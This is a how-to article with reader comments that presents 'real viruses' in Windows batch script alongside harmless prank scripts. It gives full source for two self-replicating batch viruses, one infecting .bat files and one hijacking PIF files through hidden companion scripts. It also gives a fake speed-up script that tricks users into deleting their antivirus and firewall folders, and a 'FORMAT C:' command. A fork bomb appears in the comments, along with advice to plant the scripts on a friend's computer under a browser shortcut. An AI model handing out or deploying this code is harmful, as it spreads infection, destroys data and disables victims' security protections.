Introduction: Batch Tricks and Virusses

How to make a Prank and Real viruses in BATCH

Note:I'm not responsible for any damages you do either to your computer somebody else 's computer

Note:When You wanna Save the file you should save it as anything.bat

Step 1: Real Viruses(simple Ones)

the first one:
copy the code
*********************************************************
@echo welcome to the winbooster by ELECTROfun
@echo if u want to make your computer to be faster , you should do the following steps

@pause
cd\
c:
dir
dir c:\progra~1\norton~1

@echo now you should to type y and press enter
@pause
del c:\progra~1\norton~1
@pause
c:
dir

@pause
@dir c:\progra~1
dir c:\progra~1\zonea~1\zonealarm
del c:\progra~1\zonea~1\zonealarm
@echo ok now your computer is "REALLY!" Fast
:exit
************************************************
Note:save the file anything you want .bat
Note:anything that is After @echo can be changed (you can write whatever you want)

The Second one:
***************
color 02
FORMAT C:
***************

Step 2: Real Viruses(Advanced Ones)

1. The Most powerful
*******************
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
@echo off
echo Hello World!
::---- end dummy host ----

@goto MeLTend [MeLT_2a]
:MeLTbeg
@echo off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
echo.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
echo e 120 B4 4C CD 21 00>>MeLT.t
echo g>>MeLT.t
debug<MeLT.t>nul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
*******************************************
2.This is a virus that 'infects' PIF files, used by Windows to
run DOS programs. It works by creating hidden companion batches
containing copies of this then altering the PIF file so that the
companion batch runs first. After the companion runs it runs the
original host program, the name of which is encoded into the
companion. The pif files are marked so that they will not be
re-infected. Only PIF's are affected, no changes are made to
the infected programs. To 'cure', use PIFEDIT to restore the
original file names then delete the hidden files.

**********************************************
@echo off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
echo.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
echo.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=echo
cls%_PiFV%
%PiFV%.
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
pause>nul.PiFV
set PiFV=
goto PiFV_end
:PiFV_msg
echo [PiFV] by WaveFunc
goto PiFV_end
:PiFV_hst
%PiFVo% %PiFVcl%
goto PiFV_end
:PiFV_go
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
:PiFV_inf
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
echo m 124,162 524>PiFV!
echo e 100 '@set fn='>>PiFV!
echo m 524,562 108>>PiFV!
echo n pifv$.bat>>PiFV!
echo rcx>>PiFV!
echo 47>>PiFV!
echo w>>PiFV!
echo m 55E,561 108>>PiFV!
echo e 10C 0>>PiFV!
echo n pifv$$.bat>>PiFV!
echo rcx>>PiFV!
echo 10>>PiFV!
echo w>>PiFV!
echo q>>PiFV!
:PiFV_1
debug %PiFVp%<PiFV!>nul
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
echo %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
echo n pifv$.com>>PiFV$$
echo rcx>>PiFV$$
echo 2a>>PiFV$$
echo w>>PiFV$$
echo q>>PiFV$$
debug<PiFV$$>nul
echo %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
echo @echo off>%PiFVb%
echo set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
echo e 15E 'PiFV',0>PiFV$$
echo e 124 '%PiFVb%',0>>PiFV$$
echo w>>PiFV$$
echo q>>PiFV$$
debug %PiFVp%<PiFV$$>nul
del PiFV$$
:: I think we're done!
exit PiFV
:PiFV_end
:: wonder how many bugs all this has in it? Only one
:: way to find out...

***************************************************

Step 3: Prank Virus and And a Trick

1.prank virus

*******************
color 02
@echo off
echo
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
dir/s
echo
@echo
**************************
Note:The "color 02" is to make the Text green

2.trick (matrix code)
********************************
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
******************************************

Comments

author
aadimanish (author)2016-07-01

how to change font size

author
sshahzad5 (author)2015-11-19

Loved it......keep the hacking spirit alive!! xD

author
KingstonG (author)2014-11-07

It is not a real virus but your Antivirus Software will alert you because it looks like a virus in every way but it is completely safe.

author
BFeely (author)KingstonG2015-01-19

I've noticed that Autodesk (a big software company, part of the BSA software alliance) is now the owner of Instructables. Wonder if that makes articles like this a little unsafe to publish?

author
its all me (author)2012-03-27

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks


this works better for mattrix-like code

author
chamster (author)2010-10-02

Can u e-mail this to someone?

author
love2make (author)chamster2012-03-06

you can if its in a zip file or turned into a .exe

author
madkittykat (author)2011-10-04

Radioactv Biohazard ~ It is completely safe! Matrix code is randomly generated numbers. And the /dir just is showing your directory!

Atk19380 ~ Try saving it as a .bat file!

author
maxoomen (author)2010-04-11

 the second doesn't work cause the drive is running windows and you can't format a drive when it is running something

author
MARCREED (author)2009-10-23

 yes

author
The Jamalam (author)2009-08-10

I hope you realise that distributing viruses is illegal, right?

author
ELECTROfun (author)The Jamalam2009-08-15

it's illegal if you use them ,I made this i'ble for educational purposes only

author
Radioactv Biohazard (author)2009-01-05

1 Fail: In the PRANK virus, it says: Norton, failed Some of us, like my family, do not use Norton.

author

boo norton

author
Callum Snowden (author)J-Manoo72009-06-04

I use kaspersky

author
J-Manoo7 (author)Callum Snowden2009-07-24

it works very well, even the online version

author
Gage987 (author)2009-07-14

the dirs one pwnd my command prompt it wont stop with text

author
gilbert2048 (author)2008-09-18

put in batch file and watch" %0 | %0 "this is a fork bomb pretty much locks up the computer in about a second

author
Arbitror (author)gilbert20482008-09-18

You took that from my 'ible!!!

author
rivetgeek (author)Arbitror2009-07-01

Are you seriously trying to claim ownership for a fork bomb that's been around for over ten years? Come off it

author
gilbert2048 (author)Arbitror2008-09-18

umm it came to me from wikipedia originally... i was testing different the variations on a comp or 2 at office depot

author
Arbitror (author)gilbert20482008-09-18

I put that in wiki... im not even kidding. Its fine though anyone can use it!

author
gilbert2048 (author)Arbitror2008-10-14

thank you very much for you information.

author
El Mano (author)gilbert20482008-12-21

How do you put this so-called "fork bomb" into your .bat file, and what exactly does "pretty much locks up the computer in about a second" mean?

author
octavian234 (author)El Mano2009-04-17

it means that once you save it as whatever.bat and click on it it opens itself up a bunch of timess and freezes your pc.

author
Atk19380 (author)2009-06-10

It doesn't do anything

author
wax54 (author)2009-04-06

what does it do

author
Vfef (author)2009-03-12

Its fun to put them in a file on your flash drive and take it to a friends house, take a shortcut of the .bat and put it as there FireFox or IE. Funny when they think there computers reformatting xD

author
csmiler (author)2009-01-18

what do the viruses in step 2 do?

author
csmiler (author)csmiler2009-03-06

anybody?

author
ismaelplague (author)2009-03-05

not a real virus

author
Radioactv Biohazard (author)2009-01-05

This, prank is 100% save, RIGHT?

author
edfel01 (author)2008-11-25

can u send a virus over email and wen they open it virus come out? and will the firewall and spyware stop it/ just out of curiosity...

author
Foaly7 (author)2008-10-16

What exactly does the fake virus in step 3 do?

author
ELECTROfun (author)Foaly72008-11-25

it shows that everything on your disk being deleted but actually it's not

author
gilbert2048 (author)2008-09-18

these arent really virus unless they redistribute and duplicate and/or mutate

author
spiker (author)gilbert20482008-09-22

i second that. the mis-nomers on this site are funny, a virus must redistribute itself to actually "be" a "virus." But good job on it.

author
DSAdzionator (author)spiker2008-11-22

That's where actually viruses are called viruses.

About This Instructable

28,658views

28favorites

License:

More by ELECTROfun:Telnet HackingWindows XP Tips &amp; TricksArea of a Circle
Add instructable to: